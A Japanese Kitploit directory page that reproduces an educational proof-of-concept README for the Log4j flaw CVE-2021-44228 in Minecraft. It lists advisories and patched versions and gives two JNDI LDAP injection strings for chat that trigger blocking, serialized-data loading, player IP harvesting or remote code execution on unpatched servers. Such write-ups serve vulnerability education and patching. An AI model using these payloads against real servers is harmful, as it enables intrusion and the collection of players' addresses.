Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4j-PoC — MinecraftにおけるLog4jの脆弱性(CVE-2021-44228)に関する教育目的のProof of Concept | Kitploit
ツール/GitHubGitHub/sma-das/log4j-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubsma-das/log4j-poc

Log4j-PoC

MinecraftにおけるLog4jの脆弱性(CVE-2021-44228)に関する教育目的のProof of Concept

リポジトリを見る
33年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4j(CVE-2021-44228)の概念実証

免責事項

このプロジェクトは教育目的のみです。


はじめに

これは HyCraftHD から流用した log4j RCE の概念実証です。

CVE-2021-44228 に関するリンクは以下の通りです:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

このバグはほぼすべての log4j2 と一部の log4j1 バージョンに影響します。使用推奨バージョンは 2.15.0 で、これはこの脆弱性を修正します。

Minecraft(log4j2 を使用)でのデモ

  • Minecraft への影響の詳細はこちら:https://twitter.com/slicedlime/status/1469150993527017483
  • Minecraft の記事はこちら:https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • 修正済みの Minecraft Forge バージョン:https://twitter.com/gigaherz/status/1469331288368861195
  • Minecraft Forge の詳細記事:https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • 修正済みの Minecraft Fabric バージョン:https://twitter.com/slicedlime/status/1469192689904193537
  • 修正済みの Minecraft Paper バージョン:https://twitter.com/aurora_smiles_/status/1469205803232026625
  • 修正済みの Minecraft Spigot バージョン:https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • 修正済みの Minecraft Sponge バージョン:https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

ラグまたはシリアライズされたデータの送信

  • チャットに ${jndi:ldap://127.0.0.1/e} を貼り付けます。ポート 389 に開いているソケットがある場合、log4j は接続を試み、タイムアウトが発生するまで以降の通信をブロックします。
  • この概念実証エクスプロイトを使用すると、コンソールのログに THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! が記録されます。これは ldap サーバーからのシリアライズされた文字列オブジェクトです。

image

  • さらに、悪意のある ldap サーバーは、メッセージがログに記録されるすべての IP アドレスを受け取ります。つまり、このエクスプロイトを使用してサーバー上のプレイヤーの IP アドレスを収集できます。

RCE

  • チャットに ${jndi:ldap://127.0.0.1/exe} を貼り付けます。-Dcom.sun.jndi.ldap.object.trustURLCodebase=true が true に設定されている場合、リモートコード実行が発生します。

image

  • 幸いなことに、最近の JDK はリモートクラスローディングをデフォルトで無効にしています。(https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • 古いバージョンではまだこれが許可されている可能性があります!!
ツールをダウンロード